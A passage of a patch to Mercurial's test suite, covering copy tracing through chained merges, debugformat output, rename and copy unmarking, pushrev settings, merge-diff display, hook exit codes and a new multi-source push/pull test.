These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'v' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + +The result from mPQm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) 
+ + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) + + +The result from mQPm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v + A v + r (filelog !) + r (sidedata !) + r (upgraded !) + r (upgraded-parallel !) + + +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch where the file was deleted. Merging again +should preserve the fact that the file was salvaged. + +reference output: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + R a + R p + +chained output + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' + M b + A d + a (no-changeset no-compatibility !)
+ A t + p + A unrelated-l + R a + R p + +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + +reference output: + + (for details about the filelog pick, check the mFGm/mGFm case) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + +Chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d + A d + a (no-changeset no-compatibility !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d + A d + a (no-changeset no-compatibility !) + + +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) 
+ + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f + A f + a (no-changeset no-compatibility !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,11 +39,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #else $ hg debugformat -v @@ -53,11 +55,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) 
compression-level: default default default #endif $ echo a > a @@ -345,7 +349,10 @@ $ hg co -q 0 $ hg mv a b $ hg ci -qm 'rename a to b' - $ hg rebase -d 1 --config rebase.experimental.inmemory=yes +Not only do we want this to run in-memory, it shouldn't fall back to +on-disk merge (no conflicts), so we force it to be in-memory +with no fallback. + $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes rebasing 2:* tip "rename a to b" (glob) merging a and b to b saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) @@ -421,11 +428,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -447,11 +456,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -475,11 +486,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) 
+ compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -93,8 +93,10 @@ x y $ hg debugp1copies -r 1 x -> y -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> y (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> y Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -111,8 +113,10 @@ x x2 $ hg debugp1copies -r 1 x -> x2 -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> x2 (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> x2 Rename file in a loop: x->y->z->x $ newrepo @@ -374,6 +378,29 @@ $ hg debugpathcopies 1 3 x -> z +Copy x->y on two separate branches. Pathcopies from one branch to the other +should not report the copy. + $ newrepo + $ echo x > x + $ hg ci -Aqm 'add x' + $ hg cp x y + $ hg ci -qm 'copy x to y' + $ hg co -q 0 + $ hg graft 1 -q + $ hg l + @ 2 copy x to y + | y + | o 1 copy x to y + |/ y + o 0 add x + x + $ hg debugp1copies -r 1 + x -> y + $ hg debugp1copies -r 2 + x -> y + $ hg debugpathcopies 1 2 + $ hg debugpathcopies 2 1 + Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo $ echo x > x diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -228,6 +228,17 @@ should show no copies $ hg st -C +note: since filelog based copy tracing only trace copy for new file, the copy information here is not displayed. + + $ hg status --copies --change . + M bar + +They are a devel option to walk all file and fine this information anyway. + + $ hg status --copies --change . 
--config devel.copy-tracing.trace-all-files=yes + M bar + foo + copy --after on an added file $ cp bar baz $ hg add baz @@ -266,19 +277,25 @@ $ rm baz xyzzy -Test unmarking copy of a single file +Test unmarking copy/rename of a single file # Set up by creating a copy $ hg cp bar baz -# Test uncopying a non-existent file +# Test unmarking as copy a non-existent file $ hg copy --forget non-existent non-existent: $ENOENT$ -# Test uncopying an tracked but unrelated file + $ hg rename --forget non-existent + non-existent: $ENOENT$ +# Test unmarking as copy an tracked but unrelated file $ hg copy --forget foo foo: not unmarking as copy - file is not marked as copied -# Test uncopying a copy source + $ hg rename --forget foo + foo: not unmarking as copy - file is not marked as copied +# Test unmarking as copy a copy source $ hg copy --forget bar bar: not unmarking as copy - file is not marked as copied + $ hg rename --forget bar + bar: not unmarking as copy - file is not marked as copied # baz should still be marked as a copy $ hg st -C A baz @@ -287,17 +304,38 @@ $ hg copy --forget baz $ hg st -C A baz -# Test uncopy with matching an non-matching patterns + $ rm bar + $ hg rename --after bar baz + $ hg st -C + A baz + bar + R bar + $ hg rename --forget baz + $ hg st -C + A baz + R bar + $ hg revert bar +# Test unmarking as copy with matching an non-matching patterns $ hg cp bar baz --after $ hg copy --forget bar baz bar: not unmarking as copy - file is not marked as copied + $ hg cp bar baz --after + $ hg rename --forget bar baz + bar: not unmarking as copy - file is not marked as copied $ hg st -C A baz -# Test uncopy with no exact matches +# Test unmarking as copy with no exact matches $ hg cp bar baz --after $ hg copy --forget . $ hg st -C A baz + $ hg cp bar baz --after + $ hg st -C + A baz + bar + $ hg rename --forget . 
+ $ hg st -C + A baz $ hg forget baz $ rm baz diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -186,8 +186,10 @@ node trie capacity: 4 node trie count: 2 node trie depth: 1 - node trie last rev scanned: -1 - node trie lookups: 4 + node trie last rev scanned: -1 (no-rust !) + node trie last rev scanned: 3 (rust !) + node trie lookups: 4 (no-rust !) + node trie lookups: 2 (rust !) node trie misses: 1 node trie splits: 1 revs in memory: 3 @@ -368,7 +370,8 @@ 7 1 8 1 9 1 - 10 2 + 10 2 (no-zstd !) + 10 1 (zstd !) 11 1 $ hg --config extensions.strip= strip --no-backup -r 1 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -636,7 +639,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -654,8 +656,10 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: 444 (no-rust !) + remote: 463 (rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) 
remote: 1 devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -137,6 +137,7 @@ $ hg --config 'paths.default:pushrev=notdefined()' push pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) hg: parse error: unknown identifier: notdefined + (did you mean nodefromfile?) [10] $ hg --config 'paths.default:pushrev=(' push @@ -146,4 +147,40 @@ ^ here) [10] +default :pushrev is taking in account + + $ echo babar > foo + $ hg ci -m 'extra commit' + $ hg up '.^' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo celeste > foo + $ hg ci -m 'extra other commit' + created new head + $ cat >> .hg/hgrc << EOF + > [paths] + > other = file://$WD/../pushurldest + > *:pushrev = . + > EOF + $ hg push other + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + $ hg push file://$WD/../pushurldest + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + no changes found + [1] + +for comparison, pushing everything would give different result + + $ hg push file://$WD/../pushurldest --rev 'all()' + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + abort: push creates new remote head 1616ce7cecc8 + (merge or see 'hg help push' for details about pushing new heads) + [20] + $ cd .. diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -194,4 +194,105 @@ 9 10 +merge diff should show only manual edits to a merge: + + $ hg diff --config diff.merge=yes -c 6 +(no diff output is expected here) + +Construct an "evil merge" that does something other than just the merge. 
+ + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge -r 5 + merging file.txt + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo 11 >> file.txt + $ hg ci -m 'merge 8 to y with manual edit of 11' # 7 + created new head + $ hg diff -c 7 + diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,6 +6,7 @@ + 5 + 6 + 7 + -8 + +y + 9 + 10 + +11 +Contrast with the `hg diff -c 7` version above: only the manual edit shows +up, making it easy to identify changes someone is otherwise trying to sneak +into a merge. + $ hg diff --config diff.merge=yes -c 7 + diff -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -9,3 +9,4 @@ + y + 9 + 10 + +11 + +Set up a conflict. + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ sed -e 's,^8$,z,' file.txt > file.txt.tmp + $ mv file.txt.tmp file.txt + $ hg ci -m 'conflicting edit: 8 to z' + created new head + $ echo "this file is new in p1 of the merge" > new-file-p1.txt + $ hg ci -Am 'new file' new-file-p1.txt + $ hg log -r . --template 'p1 will be rev {rev}\n' + p1 will be rev 9 + $ hg co 5 + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo "this file is new in p2 of the merge" > new-file-p2.txt + $ hg ci -Am 'new file' new-file-p2.txt + created new head + $ hg log -r . --template 'p2 will be rev {rev}\n' + p2 will be rev 10 + $ hg co -- 9 + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge -r 10 + merging file.txt + warning: conflicts while merging file.txt! 
(edit, then use 'hg resolve --mark') + 1 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon + [1] + $ hg revert file.txt -r . + $ hg resolve -ma + (no more unresolved files) + $ hg commit -m 'merge conflicted edit' +Without diff.merge, it's a diff against p1 + $ hg diff --config diff.merge=no -c 11 + diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt + --- /dev/null Thu Jan 01 00:00:00 1970 +0000 + +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -0,0 +1,1 @@ + +this file is new in p2 of the merge +With diff.merge, it's a diff against the conflicted content. + $ hg diff --config diff.merge=yes -c 11 + diff -r 5010caab09f6 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,12 +6,6 @@ + 5 + 6 + 7 + -<<<<<<< local: fd1f17c90d7c - test: new file + z + -||||||| base + -8 + -======= + -y + ->>>>>>> other: d9e7de69eac3 - test: new file + 9 + 10 + +There must _NOT_ be a .hg/merge directory leftover. + $ test ! -d .hg/merge +(No output is expected) $ cd .. diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -154,7 +154,7 @@ $ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default 0:cb9a9f314b8b $ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default @@ -166,7 +166,7 @@ $ HGPLAIN= hg log --config='hooks.pre-log=false' -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAINEXCEPT= hg log --cwd .. 
-q -Ra -b default 0:cb9a9f314b8b diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ ('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t new file mode 100644 --- /dev/null +++ b/tests/test-exchange-multi-source.t @@ -0,0 +1,613 @@ +==================================================== +Test push/pull from multiple source at the same time +==================================================== + + +Setup +===== + +main repository +--------------- + + $ . $RUNTESTDIR/testlib/common.sh + $ hg init main-repo + $ cd main-repo + $ mkcommit A + $ mkcommit B + $ mkcommit C + $ mkcommit D + $ mkcommit E + $ hg up 'desc(B)' + 0 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ mkcommit F + created new head + $ mkcommit G + $ hg up 'desc(C)' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ mkcommit H + created new head + $ hg up null --quiet + $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ cd .. 
+ +Various other repositories +-------------------------- + + $ hg clone main-repo branch-E --rev 4 -U + adding changesets + adding manifests + adding file changes + added 5 changesets with 5 changes to 5 files + new changesets 4a2df7238c3b:a603bfb5a83e + $ hg clone main-repo branch-G --rev 6 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:c521a06b234b + $ hg clone main-repo branch-H --rev 7 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:40faebb2ec45 + +Test simple bare operation +========================== + +pull +---- + + $ hg clone main-repo test-repo-bare --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + + $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' 
to see heads, 'hg merge' to merge) + $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +push +---- + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + | o changeset: 6:c521a06b234b + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: G + | | + | o changeset: 5:2f3a4c5c1417 + | parent: 1:27547f69f254 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: F + | + | o changeset: 4:a603bfb5a83e + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: E + | | + | o changeset: 3:b3325c91a4d9 + |/ user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: D + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push + searching for changes + searching for changes + searching for changes + 6 changesets found + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files (+2 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + pushing to ./branch-H-push + searching for changes + adding 
changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 6 + | | + | o D 5 + |/ + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o G 7 + | + o F 6 + | + | o E 5 + | | + | o D 4 + | | + | | o H 3 + | |/ + | o C 2 + |/ + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Test operation with a target +============================ + +pull +---- + + $ hg clone main-repo test-repo-rev --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + +pulling an explicite revision + + $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'` + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 27547f69f254 + (run 'hg update' to get a working copy) + pulling from ./branch-G + no changes found + pulling from ./branch-H + no changes found + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o B 1 + | + o A 0 + + +pulling a branch head, the branch head resolve to different revision on the +different repositories. 
+ + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files + new changesets f838bfaca5c7:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' to see heads, 'hg merge' to merge) + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +push +---- + +We only push a specific branch with --rev + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push 
./branch-H-push --rev default + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Same push, but the first one is a no-op + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + comparing with ./branch-E-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file 
